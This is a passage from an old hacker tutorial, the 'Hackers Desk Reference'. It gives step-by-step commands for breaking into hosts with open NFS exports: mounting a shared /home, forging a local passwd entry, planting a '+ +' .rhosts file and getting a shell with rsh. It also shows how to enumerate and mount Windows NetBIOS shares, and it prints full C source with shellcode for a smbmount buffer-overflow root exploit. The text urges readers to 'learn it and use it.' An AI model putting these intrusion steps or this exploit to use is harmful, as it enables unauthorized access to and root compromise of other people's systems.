Hackers Desk Reference

A showmount on ninja.com would look like this:

InterCore:/home/chameleon/ $/usr/sbin/showmount -e www.ninja.com

export list for www.ninja.com:

/home Everyone

/usr elite.ninja.com

/var samuri.ninja.com

InterCore:/home/chameleon/ $

The first section is the folder name. The section part is who has access. If it says Everyone then anyone at all can access that folder. If it has an address like elite.ninja.com only people from elite.ninja.com can access that folder. If there is a users folder shared or a home folder etc... that is shared to everyone then you can gain a user account to the system. You would do the following. Say we use ninja.com as an example. We earlier saw that we have access to /home we would then mount /home and goto a users directory and create us an rlogin for the system. The attack would be as follows.

InterCore:/home/chameleon$ /usr/sbin/showmount -e www.ninja.com

export list for www.ninja.com:

/home Everyone

/usr elite.ninja.com

/var samuri.ninja.com

Now, you must su to root to have access to mount things to various folders on the system.

InterCore:/home/chameleon/ $su

Password:

What you are looking at here is the contents of www.ninja.com's home dir. Now lets add one of their users to our passfile, so we can become them.

InterCore:# pico /etc/passwd

add the lines:

pamcourt::200:10023:Pam Court:/home/chameleon/mnt/pamcourt/:/bin/bash

^---we put this as the home dir, because this is where the mounted home directory is located.

now, login locally as pamcourt

InterCore:/mnt/home/pamcourt/$ whoami

pamcourt

InterCore:/mnt/home/pamcourt/$ echo "+ +" > ~/.rhosts

This will make the rhosts entry as ++, which means anyone can remotely issue commands from it. Now, we remotely login to ninja.com as pamcourt

InterCore:/mnt/home/pamcourt/$rsh -l pamcourt www.ninja.com csh -i

Welcome to ninja.com

We are lame and left open a filesharing backdoor.

You therefore have a shell on ninja.com. The rsh and rlogin syntax is as follows:

rsh [ -l login ] [ -n ] host command

rlogin [ -E | -ex ] [ -l username ] [ -8 ] [ -L ] host

That is how to gain a user account onto a remote system. Also if you can spoof your dns or maybe the server has a router on it etc... that you can bounce through you could therefore access any files that are shared to that restricted host. Ex: in our above example if we spoofed as elite.ninja.com we would then have access to /usr. Although this technique is old it still works on many servers. So learn it and use it.

To check if a server has filesharing do: rpcinfo -p server.com

terra:/home/m/mgi/.noid $rpcinfo -p oberon.calstatela.edu

program vers proto port service

100000 4 tcp 111 rpcbind

100000 3 tcp 111 rpcbind

100000 2 udp 111 rpcbind

If it has a like the above one that says nfs, then it has filesharing.

[16.0.3] COMPARISION TO THE MICROSOFT WINDOWS FILESHARING

NBTSTAT -a www.ninja.com would show the NetBIOS Statistics which includes shared folders (directories)

C:\nbtstat -A 204.73.131.11

NetBIOS Remote Machine Name Table

..__MSBROWSE__.<01> GROUP Registered

MAC Address = 00-C0-4F-C4-8C-9D

C:\net view 204.73.131.11

Shared resources at 204.73.131.11

------------------------------------------------------------------------------

The command completed successfully.

C:\net use x: \\204.73.131.11\test

The command completed successfully.

[16.0.4] SMBXPL.C

/*

The default parameters to the program

often work, however I have found that the offset parameter sometimes varies wildly, values between -600 and -100 usually work though, a quick shell script will scan through these.

*/

/*

** smbexpl -- a smbmount root exploit under Linux

**

**Author: Gerald Britton <gbritton@nih.gov>

**This code exploits a buffer overflow in smbmount from smbfs-2.0.1.

**The code does not do range checking when copying a username from

**the environment variables USER or LOGNAME. To get this far into

**the code we need to execute with dummy arguments of a server and a

**mountpoint to use (./a in this case). The user will need to create

**the ./a directory and then execute smbexpl to gain root. This code

**is also setup to use /tmp/sh as the shell as bash-2.01 appears to

**do a seteuid(getuid()) so /bin/sh on my system won't work. Finally

**a "-Q" (an invalid commandline argument) causes smbmount to fail when

**parsing args and terminate, thus jumping into our shellcode.

**

** The shellcode used in this program also needed to be specialized as

**smbmount toupper()'s the contents of the USER variable. Self modifying

**code was needed to ensure that the shellcode will survive toupper().

**

** The quick fix for the security problem:

**chmod -s /sbin/smbmount

**A better fix would be to patch smbmount to do bounds checking when

**copying the contents of the USER and LOGNAME variables.

**

*/

#include <stdlib.h> #include <stdio.h>

/* This shell code is designed to survive being filtered by toupper() */

char shellcode[] = "\xeb\x20\x5e\x8d\x46\x05\x80\x08\x20\x8d\x46\x27\x80\x08\x20\x40"

"\x80\x08\x20\x40\x80\x08\x20\x40\x40\x80\x08\x20\x40\x80\x08\x20"

"\xeb\x05\xe8\xdb\xff\xff\xff"

"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"

"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"

"\x80\xe8\xdc\xff\xff\xff/tmp/sh";

unsigned long get_sp(void) { __asm__("movl %esp,%eax");

}

void main(int argc, char *argv[]) { char *buff, *ptr;

long *addr_ptr, addr;

int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE; int alignment=DEFAULT_ALIGNMENT;

int i;

if (argc > 1) bsize = atoi(argv[1]); if (argc > 2) offset = atoi(argv[2]);

if (argc > 3) alignment = atoi(argv[3]);

printf("bsize=%d offset=%d alignment=%d\n",bsize,offset,alignment);

if (!(buff = malloc(bsize))) {

printf("Can't allocate memory.\n"); exit(0);

}

addr = get_sp() - offset;

fprintf(stderr,"Using address: 0x%x\n", addr);

ptr = buff;

addr_ptr = (long *) (ptr+alignment); for (i = 0; i < bsize-alignment; i+=4) *(addr_ptr++) = addr;

for (i = 0; i < bsize/2; i++) buff[i] = NOP;

ptr = buff + (128 - strlen(shellcode)); for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i];

buff[bsize - 1] = '\0';

setenv("USER",buff,1); execl("/sbin/smbmount","smbmount","//a/a","./a","-Q",0);

}

[16.0.5] Basic Unix Commands

pwd - Shows the current directory that you are in.

cd - change directory. Ex: cd hack would put you into the directory hack

cd .. would drop you back 1 directory. So if you are in /home/chameleon and you type cd

.. you would then be in /home

ls - List files. ls -a to show ALL files. ls -l to list files in long format with byte size etc.. ls -la to do both.

chmod - This command changes permissions of a file or directory. The syntax is as follows:

chmod who+,-,=r,w,x

who can be u (user) g (group) o (other) a (all)

The + means to add the permission and - means to remove the permission.

cat - This prints out stuff to the screen. Such as files. Ex: cat /etc/passwd this would print the password file to the screen. You could also do cat /etc/passwd > password.txt this would redirect the out put of passwd into the file password.txt, that is what the > is used for.

passwd - Changes password to a users account.

ps - Shows what processes you have running. ps -e will show everything that you have running.

grep - Searches for words that you specify. This can be used to search a file for a certain word

Ex:

$ grep rhino9 elite.txt

Rhino9 is elite...